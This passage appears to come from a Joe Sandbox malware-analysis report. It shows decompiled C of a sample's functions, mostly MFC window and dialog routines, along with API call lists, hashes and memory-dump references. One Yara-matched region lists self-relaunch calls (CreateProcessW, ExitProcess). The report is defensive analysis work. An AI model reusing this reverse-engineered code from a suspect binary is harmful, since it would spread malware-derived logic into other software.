                  					_t189 = E00411C95(_t195, _t198, 0, _t209, __eflags);
                  					__eflags = _t189;
                  					if(_t189 != 0) {
                  						_t209 = _t209 | 0x00000020;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000002;
                  				if(__eflags != 0) {
                  					_push( &_v56);
                  					_v56 = 0;
                  					_v20 = "AfxControlBar90s";
                  					_v28 = 0x10;
                  					_t187 = E00411C95(_t195, _t198, 0, _t209, __eflags);
                  					__eflags = _t187;
                  					if(_t187 != 0) {
                  						_t209 = _t209 | 0x00000002;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000004;
                  				if(__eflags != 0) {
                  					_v56 = _t195;
                  					_v28 = 0;
                  					_t185 = E00411F52(_t198, __eflags,  &_v56, "AfxMDIFrame90s", 0x7a01);
                  					__eflags = _t185;
                  					if(_t185 != 0) {
                  						_t209 = _t209 | 0x00000004;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & _t195;
                  				if(__eflags != 0) {
                  					_v56 = 0xb;
                  					_v28 = 6;
                  					_t183 = E00411F52(_t198, __eflags,  &_v56, "AfxFrameOrView90s", 0x7a02);
                  					__eflags = _t183;
                  					if(_t183 != 0) {
                  						_t209 = _t209 | _t195;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000010;
                  				if(__eflags != 0) {
                  					_v12 = 0xff;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x3fc0);
                  					_t48 =  &_a4;
                  					 *_t48 = _a4 & 0xffffc03f;
                  					__eflags =  *_t48;
                  				}
                  				__eflags = _a4 & 0x00000040;
                  				if(__eflags != 0) {
                  					_v12 = 0x10;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x40);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000080;
                  				if(__eflags != 0) {
                  					_v12 = 2;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x80);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000100;
                  				if(__eflags != 0) {
                  					_v12 = _t195;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x100);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000200;
                  				if(__eflags != 0) {
                  					_v12 = 0x20;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x200);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000400;
                  				if(__eflags != 0) {
                  					_v12 = 1;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x400);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000800;
                  				if(__eflags != 0) {
                  					_v12 = 0x40;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x800);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00001000;
                  				if(__eflags != 0) {
                  					_v12 = 4;
                  					_t167 = E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x1000); // executed
                  					_t209 = _t209 | _t167;
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00002000;
                  				if(__eflags != 0) {
                  					_v12 = 0x80;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x2000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00004000;
                  				if(__eflags != 0) {
                  					_v12 = 0x800;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x4000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00008000;
                  				if(__eflags != 0) {
                  					_v12 = 0x400;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x8000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00010000;
                  				if(__eflags != 0) {
                  					_v12 = 0x200;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x10000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00020000;
                  				if(__eflags != 0) {
                  					_v12 = 0x100;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x20000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00040000;
                  				if(__eflags != 0) {
                  					_v12 = 0x8000;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x40000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00080000;
                  				if(__eflags != 0) {
                  					_v12 = 0x1000;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x80000);
                  					__eflags = _t209;
                  				}
                  				_t199 = _v8;
                  				 *(_t199 + 0x18) =  *(_t199 + 0x18) | _t209;
                  				_t145 =  *(_t199 + 0x18);
                  				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
                  				if((_t145 & 0x00003fc0) == 0x3fc0) {
                  					 *(_t199 + 0x18) = _t145 | 0x00000010;
                  					_t209 = _t209 | 0x00000010;
                  					__eflags = _t209;
                  				}
                  				asm("sbb eax, eax");
                  				_t150 =  ~((_t209 & _a4) - _a4) + 1;
                  				__eflags = _t150;
                  				return _t150;
                  			}





























                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: @$@$AfxControlBar90s$AfxFrameOrView90s$AfxMDIFrame90s
                  • API String ID: 2102423945-1210016405
                  • Opcode ID: 48f1f3766a55285f2edbc49f154cf69d3c1f460646b03b50caf20c9a1f8d3e0c
                  • Instruction ID: a80ea7a57d0ef6c1a4e0f94e743f0cf838566c70e38dc4dc6695c3c797ddb862
                  • Opcode Fuzzy Hash: 48f1f3766a55285f2edbc49f154cf69d3c1f460646b03b50caf20c9a1f8d3e0c
                  • Instruction Fuzzy Hash: 2091F175D00209BBDB50DFD4C586BDFBFE8AB48344F14817AFA08E6181E7B88A95C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 63%
                  			E00406EBD(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                  				signed int _v8;
                  				char _v17;
                  				char _v18;
                  				signed int _v19;
                  				char _v28;
                  				long _v32;
                  				signed int _v36;
                  				char _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t43;
                  				signed int _t50;
                  				signed char _t57;
                  				void* _t68;
                  				void* _t86;
                  				intOrPtr* _t87;
                  				intOrPtr* _t88;
                  				signed int _t89;
                  
                  				_t86 = __edx;
                  				_t43 =  *0x463404; // 0x18eab29f
                  				_v8 = _t43 ^ _t89;
                  				_t87 = _a8;
                  				_t88 = __ecx;
                  				_push( &_v28);
                  				_push(_a4);
                  				_push(0x417);
                  				 *((intOrPtr*)( *__ecx + 0x118))();
                  				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
                  				_v18 = 0;
                  				_v17 = 0;
                  				 *((char*)(_t87 + 0xa)) = 0;
                  				 *((char*)(_t87 + 0xb)) = 0;
                  				if(E00431DB1(_t87,  &_v28, 0x14) != 0) {
                  					_t50 = E00412B38(_t88);
                  					_t69 = _t50;
                  					_v36 = _t50;
                  					E00412B6C(_t88, 0x10000000, 0, 0); // executed
                  					 *((intOrPtr*)( *_t88 + 0x118))(0x416, _a4, 0, _t68);
                  					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
                  						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
                  						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
                  						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
                  						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
                  						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
                  						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
                  						_t69 = _v36;
                  					}
                  					 *((intOrPtr*)( *_t88 + 0x118))(_a4, _t87);
                  					E00412B6C(_t88, 0, _t69 & 0x10000000, 0); // executed
                  					_t57 =  *((intOrPtr*)(_t87 + 9));
                  					_t68 = 0x415;
                  					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
                  						_push(1);
                  						_push(0);
                  						goto L9;
                  					} else {
                  						_push( &_v52);
                  						_push(_a4);
                  						_push(0x41d);
                  						if( *((intOrPtr*)( *_t88 + 0x118))() != 0) {
                  							_push(1);
                  							_push( &_v52);
                  							L9:
                  							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
                  						}
                  					}
                  				}
                  				return E00430650(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
                  			}























                  APIs
                  • _memcmp.LIBCMT ref: 00406F07
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SendMessageA.USER32(?,0000043D,00000000,00000000), ref: 00406F60
                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00406F6E
                  • SendMessageA.USER32(?,0000043C,?,00000000), ref: 00406F7F
                  • SendMessageA.USER32(?,0000043C,?,00000000), ref: 00406F8E
                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00406F99
                  • InvalidateRect.USER32(?,00000000,00000001,00000000,00000000), ref: 0040700C
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateLongRectWindow_memcmp
                  • String ID:
                  • API String ID: 235743446-0
                  • Opcode ID: b4ca3858cf842c725fa609f0672fd941354109755bb967841d1566607b793c20
                  • Instruction ID: 911494d41f6155cba064028fc0f85afa7879889cb5e7fc441d97dfeff554b02b
                  • Opcode Fuzzy Hash: b4ca3858cf842c725fa609f0672fd941354109755bb967841d1566607b793c20
                  • Instruction Fuzzy Hash: CE417E30740208BBEB219F65CC56FEEBBB4FF08B14F104529F6556A2D1CBB4A950CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 023ECDBC
                  • GetCommandLineW.KERNEL32 ref: 023ECDFA
                  • lstrlenW.KERNEL32(00000000), ref: 023ECE03
                  • lstrlenW.KERNEL32(?), ref: 023ECE12
                  • lstrcmpiW.KERNEL32(00000000,?), ref: 023ECE27
                  • ExitProcess.KERNEL32 ref: 023ECE38
                    • Part of subcall function 023E1CC2: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 023E1CF2
                  • ExitProcess.KERNEL32 ref: 023ECE5F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleNamelstrcmpi
                  • String ID:
                  • API String ID: 1899540587-0
                  • Opcode ID: eefdf306e8166ca9d2b27cd2953862a3bdde2e27c2eecb82b539c10bbc42ffc2
                  • Instruction ID: 7a99ac36ad741e1238dc680fc244f3947c13f92fe1549d48f999b7ead3bc44a1
                  • Opcode Fuzzy Hash: eefdf306e8166ca9d2b27cd2953862a3bdde2e27c2eecb82b539c10bbc42ffc2
                  • Instruction Fuzzy Hash: 5A11E1B2940028ABDB64B764AC88EFE77BDEB80705F000451F20A93185EF305D5C8EA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00416A7E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t18;
                  				void* _t44;
                  				void* _t48;
                  
                  				_t42 = __edx;
                  				_t31 = __ebx;
                  				_push(8);
                  				_t18 = E00431A9B(E0044B456, __ebx, __edi, __esi);
                  				_t44 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x90)) == 0) {
                  					_t51 =  *((intOrPtr*)(__ecx + 0x92));
                  					if( *((intOrPtr*)(__ecx + 0x92)) == 0) {
                  						E004014C0(_t48 - 0x14, __edx);
                  						 *((intOrPtr*)(_t48 - 4)) = 0;
                  						E004292E7(__ebx, __edx,  *((intOrPtr*)(E0041F363(__ebx, _t44, 0, _t51) + 8)), _t48 - 0x14); // executed
                  						_push(PathFindFileNameA( *(_t48 - 0x14)));
                  						E00406039(_t31, _t48 - 0x10, _t42, _t44, 0, _t51);
                  						 *((char*)(_t48 - 4)) = 1;
                  						PathRemoveExtensionA(E0040A688(_t48 - 0x10));
                  						E0040A356(_t48 - 0x10, 0xffffffff);
                  						 *((short*)(_t44 + 0x90)) = GlobalAddAtomA( *(_t48 - 0x10));
                  						 *((short*)(_t44 + 0x92)) = GlobalAddAtomA("system");
                  						E004010B0( &(( *(_t48 - 0x10))[0xfffffffffffffff0]), _t42);
                  						_t18 = E004010B0( &(( *(_t48 - 0x14))[0xfffffffffffffff0]), _t42);
                  					}
                  				}
                  				return E00431B73(_t18);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00416A85
                    • Part of subcall function 004292E7: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                    • Part of subcall function 004292E7: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  • PathFindFileNameA.SHLWAPI(?,00000008,004017F8), ref: 00416AC8
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • PathRemoveExtensionA.SHLWAPI(00000000,00000000), ref: 00416AE4
                  • GlobalAddAtomA.KERNEL32 ref: 00416AFD
                  • GlobalAddAtomA.KERNEL32 ref: 00416B0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: NamePath$AtomFileGlobalH_prolog3$ExtensionFindModuleRemoveShort
                  • String ID: system
                  • API String ID: 403193770-3377271179
                  • Opcode ID: 715c8a44715037ab561ca445d125d12101abcb7d420da627e4c206c2fae4e1a1
                  • Instruction ID: 6af8255d80fce4e2872a3a295f9b7920885497d175e20f34bb1b1a59f62aa56d
                  • Opcode Fuzzy Hash: 715c8a44715037ab561ca445d125d12101abcb7d420da627e4c206c2fae4e1a1
                  • Instruction Fuzzy Hash: E1117031800126ABCF05EBB5CC46AAFB774BF00358F50422EB425272E2DB782944C7AE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0042FFA2(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t11;
                  				void* _t14;
                  				intOrPtr _t17;
                  				void* _t18;
                  				struct HINSTANCE__* _t19;
                  				void* _t31;
                  				intOrPtr _t35;
                  				void* _t36;
                  				void* _t37;
                  
                  				_t37 = __eflags;
                  				_t32 = __edi;
                  				_t31 = __edx;
                  				_t25 = __ebx;
                  				_t11 = SetErrorMode(0); // executed
                  				SetErrorMode(_t11 | 0x00008001); // executed
                  				_t14 = E0041F363(__ebx, __edi, SetErrorMode, _t37);
                  				_t35 = _a4;
                  				 *((intOrPtr*)(_t14 + 8)) = _t35;
                  				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
                  				E0041EB0A(__ebx, _t14, _t31); // executed
                  				_t17 =  *((intOrPtr*)(E0041F363(_t25, __edi, _t35, _t37) + 4));
                  				_t38 = _t17;
                  				if(_t17 != 0) {
                  					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
                  					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
                  					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
                  					E0042FE1C(_t17, _t31, _t38); // executed
                  				}
                  				_t18 = E0041F363(_t25, _t32, _t35, _t38);
                  				_t39 =  *((char*)(_t18 + 0x14));
                  				_pop(_t36);
                  				if( *((char*)(_t18 + 0x14)) == 0) {
                  					E004161F7(_t36, _t39);
                  				}
                  				_t19 = GetModuleHandleA("user32.dll");
                  				if(_t19 != 0) {
                  					 *0x46633c = GetProcAddress(_t19, "NotifyWinEvent");
                  				}
                  				return 1;
                  			}

                  APIs
                  • SetErrorMode.KERNELBASE(00000000), ref: 0042FFB0
                  • SetErrorMode.KERNELBASE(00000000), ref: 0042FFB8
                    • Part of subcall function 0041EB0A: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EB42
                    • Part of subcall function 0041EB0A: SetLastError.KERNEL32(0000006F), ref: 0041EB59
                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00430007
                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00430017
                    • Part of subcall function 0042FE1C: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042FE59
                    • Part of subcall function 0042FE1C: PathFindExtensionA.KERNELBASE(?), ref: 0042FE73
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FEBB
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FEFA
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FF41
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ErrorModule__strdup$FileModeName$AddressExtensionFindHandleLastPathProc
                  • String ID: NotifyWinEvent$user32.dll
                  • API String ID: 621541537-597752486
                  • Opcode ID: c6a86a99ad862286b29c596775c83a7a365c59ac402591dd4d029d8a3d1260bd
                  • Instruction ID: c3559d0f6dcdbc91b9a4477413689282f5a49392fc776aba5323f530c7d64581
                  • Opcode Fuzzy Hash: c6a86a99ad862286b29c596775c83a7a365c59ac402591dd4d029d8a3d1260bd
                  • Instruction Fuzzy Hash: 9C015E74A102149BD714AF66A845A9A3AE8AB08724B05806BF845D7352DA78D8448B69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00417A77(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t60;
                  				signed int _t65;
                  				signed int _t68;
                  				struct HWND__* _t69;
                  				struct HWND__* _t70;
                  				signed int _t72;
                  				signed int _t102;
                  				void* _t113;
                  				signed int _t116;
                  				DLGTEMPLATE* _t117;
                  				struct HWND__* _t118;
                  				intOrPtr* _t120;
                  				void* _t121;
                  
                  				_t115 = __edi;
                  				_t113 = __edx;
                  				_t96 = __ecx;
                  				_push(0x3c);
                  				E00431ACE(E0044B598, __ebx, __edi, __esi);
                  				_t120 = __ecx;
                  				 *((intOrPtr*)(_t121 - 0x20)) = __ecx;
                  				_t125 =  *(_t121 + 0x10);
                  				if( *(_t121 + 0x10) == 0) {
                  					 *(_t121 + 0x10) =  *(E0041F363(0, __edi, __ecx, _t125) + 0xc);
                  				}
                  				_t116 =  *(E0041F363(0, _t115, _t120, _t125) + 0x3c);
                  				 *(_t121 - 0x28) = _t116;
                  				 *(_t121 - 0x14) = 0;
                  				 *(_t121 - 4) = 0;
                  				E00411F96(0, _t96, _t116, _t120, _t125, 0x10);
                  				E00411F96(0, _t96, _t116, _t120, _t125, 0x3c000);
                  				if(_t116 == 0) {
                  					_t117 =  *(_t121 + 8);
                  					L7:
                  					__eflags = _t117;
                  					if(_t117 == 0) {
                  						L4:
                  						_t60 = 0;
                  						L26:
                  						return E00431B73(_t60);
                  					}
                  					E004014C0(_t121 - 0x1c, _t113);
                  					 *(_t121 - 4) = 1;
                  					 *((intOrPtr*)(_t121 - 0x18)) = 0;
                  					_t65 = E0042A0D6(__eflags, _t117, _t121 - 0x1c, _t121 - 0x18);
                  					__eflags = _t65;
                  					__eflags = 0 | _t65 == 0x00000000;
                  					if(__eflags != 0) {
                  						_push(_t117);
                  						E0042A09A(0, _t121 - 0x38, _t117);
                  						 *(_t121 - 4) = 2;
                  						E00429FF6(_t121 - 0x38,  *((intOrPtr*)(_t121 - 0x18)));
                  						 *(_t121 - 0x14) = E00429D03(_t121 - 0x38);
                  						 *(_t121 - 4) = 1;
                  						E00429CF5(_t121 - 0x38);
                  						__eflags =  *(_t121 - 0x14);
                  						if(__eflags != 0) {
                  							_t117 = GlobalLock( *(_t121 - 0x14));
                  						}
                  					}
                  					 *(_t120 + 0x44) =  *(_t120 + 0x44) | 0xffffffff;
                  					 *(_t120 + 0x3c) =  *(_t120 + 0x3c) | 0x00000010;
                  					E00410F0D(__eflags, _t120);
                  					_t68 =  *(_t121 + 0xc);
                  					__eflags = _t68;
                  					if(_t68 != 0) {
                  						_t69 =  *(_t68 + 0x20);
                  					} else {
                  						_t69 = 0;
                  					}
                  					_t70 = CreateDialogIndirectParamA( *(_t121 + 0x10), _t117, _t69, E00417499, 0); // executed
                  					_t118 = _t70;
                  					E004010B0( *((intOrPtr*)(_t121 - 0x1c)) + 0xfffffff0, _t113);
                  					 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
                  					_t102 =  *(_t121 - 0x28);
                  					__eflags = _t102;
                  					if(__eflags != 0) {
                  						__eflags = _t118;
                  						if(__eflags != 0) {
                  							 *((intOrPtr*)( *_t102 + 0x18))(_t121 - 0x48);
                  							 *((intOrPtr*)( *_t120 + 0x134))(0);
                  						}
                  					}
                  					_t72 = E0040EEF5(__eflags);
                  					__eflags = _t72;
                  					if(_t72 == 0) {
                  						 *((intOrPtr*)( *_t120 + 0x11c))();
                  					}
                  					__eflags = _t118;
                  					if(_t118 != 0) {
                  						__eflags =  *(_t120 + 0x3c) & 0x00000010;
                  						if(( *(_t120 + 0x3c) & 0x00000010) == 0) {
                  							DestroyWindow(_t118);
                  							_t118 = 0;
                  							__eflags = 0;
                  						}
                  					}
                  					__eflags =  *(_t121 - 0x14);
                  					if( *(_t121 - 0x14) != 0) {
                  						GlobalUnlock( *(_t121 - 0x14));
                  						GlobalFree( *(_t121 - 0x14));
                  					}
                  					__eflags = _t118;
                  					_t54 = _t118 != 0;
                  					__eflags = _t54;
                  					_t60 = 0 | _t54;
                  					goto L26;
                  				}
                  				_push(_t121 - 0x48);
                  				if( *((intOrPtr*)( *_t120 + 0x134))() != 0) {
                  					_t117 =  *((intOrPtr*)( *_t116 + 0x14))(_t121 - 0x48,  *(_t121 + 8));
                  					goto L7;
                  				}
                  				goto L4;
                  			}

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 00417A7E
                  • GlobalLock.KERNEL32 ref: 00417B56
                  • CreateDialogIndirectParamA.USER32(?,?,?,Function_00017499,00000000), ref: 00417B85
                  • DestroyWindow.USER32(00000000), ref: 00417BFF
                  • GlobalUnlock.KERNEL32(?), ref: 00417C0F
                  • GlobalFree.KERNEL32 ref: 00417C18
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                  • String ID:
                  • API String ID: 3003189058-0
                  • Opcode ID: 26ae8e959123f86c784b667f59ab4b8ba21f1b10ffa1528ca1f931d7bb6d0aa9
                  • Instruction ID: 0f3f62645ed42ea5829c959189857bbee3ade0c5a9f02b3c178cd9c28f783011
                  • Opcode Fuzzy Hash: 26ae8e959123f86c784b667f59ab4b8ba21f1b10ffa1528ca1f931d7bb6d0aa9
                  • Instruction Fuzzy Hash: 0C51B331A04209DFCF10EFA5C9859EEBBB1BF08318F14442EF502E7291DB789A81CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 62%
                  			E00414166(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
                  				signed int _v8;
                  				char _v268;
                  				RECT* _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				char _v292;
                  				intOrPtr _v296;
                  				signed int _v300;
                  				struct tagRECT _v316;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t71;
                  				signed char _t79;
                  				signed int _t84;
                  				signed int _t89;
                  				signed int _t91;
                  				signed int _t99;
                  				signed int _t114;
                  				intOrPtr _t128;
                  				intOrPtr _t129;
                  				intOrPtr _t136;
                  				intOrPtr _t151;
                  				signed int _t153;
                  				intOrPtr _t154;
                  				intOrPtr _t157;
                  				intOrPtr _t158;
                  				signed int _t163;
                  
                  				_t151 = __edx;
                  				_t130 = __ecx;
                  				_t161 = _t163;
                  				_t71 =  *0x463404; // 0x18eab29f
                  				_v8 = _t71 ^ _t163;
                  				_t157 = _a4;
                  				_t128 = __ecx;
                  				_t153 = 0;
                  				_v276 = _t157;
                  				_v272 = _a8;
                  				_t167 = __ecx;
                  				if(__ecx == 0) {
                  					L2:
                  					E00406436(_t128, _t130, _t153, _t157, _t167);
                  				}
                  				if(_t157 == _t153) {
                  					goto L2;
                  				}
                  				_t76 = GetWindowRect( *(_t157 + 0x20),  &_v316);
                  				if( *((intOrPtr*)(_t157 + 0x90)) != _t128 || _v272 != _t153 && EqualRect( &_v316, _v272) == 0) {
                  					if( *((intOrPtr*)(_t128 + 0x98)) != _t153 && ( *(_t157 + 0x88) & 0x00000040) != 0) {
                  						 *(_t128 + 0x84) =  *(_t128 + 0x84) | 0x00000040;
                  					}
                  					 *(_t128 + 0x84) =  *(_t128 + 0x84) & 0xfffffff9;
                  					_t79 =  *(_t157 + 0x84) & 0x00000006 |  *(_t128 + 0x84);
                  					 *(_t128 + 0x84) = _t79;
                  					_t175 = _t79 & 0x00000040;
                  					if((_t79 & 0x00000040) == 0) {
                  						_push(0x104);
                  						_push( &_v268);
                  						E00412D87(_t128, _t157, _t151, _t153, _t157, _t175); // executed
                  						E0041FC5A(_t157, _t151,  *((intOrPtr*)(_t128 + 0x20)),  &_v268); // executed
                  					}
                  					_t84 = ( *(_t157 + 0x84) ^  *(_t128 + 0x84)) & 0x0000f000 ^  *(_t157 + 0x84) | 0x00000f00;
                  					if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
                  						_t85 = _t84 & 0xfffffffe;
                  						__eflags = _t84 & 0xfffffffe;
                  					} else {
                  						_t85 = _t84 | 0x00000001;
                  					}
                  					E00420D66(_t157, _t85);
                  					_v296 = _t153;
                  					if( *((intOrPtr*)(_t157 + 0x90)) != _t128 && IsWindowVisible( *(_t157 + 0x20)) != 0) {
                  						E00412D05(_t157, _t153, _t153, _t153, _t153, _t153, 0x97);
                  						_v296 = 1;
                  					}
                  					_v300 = _v300 | 0xffffffff;
                  					if(_v272 == _t153) {
                  						E004133A2(_t128 + 0x9c, _t157);
                  						E004133A2(_t128 + 0x9c, _t153);
                  						_t89 =  *0x466524; // 0x2
                  						_t91 =  *0x466520; // 0x2
                  						_t135 = _t157;
                  						E00412D05(_t157, _t153,  ~_t91,  ~_t89, _t153, _t153, 0x115);
                  					} else {
                  						E00413342( &_v292, _v272);
                  						E00422BFB(_t128,  &_v292);
                  						asm("cdq");
                  						asm("cdq");
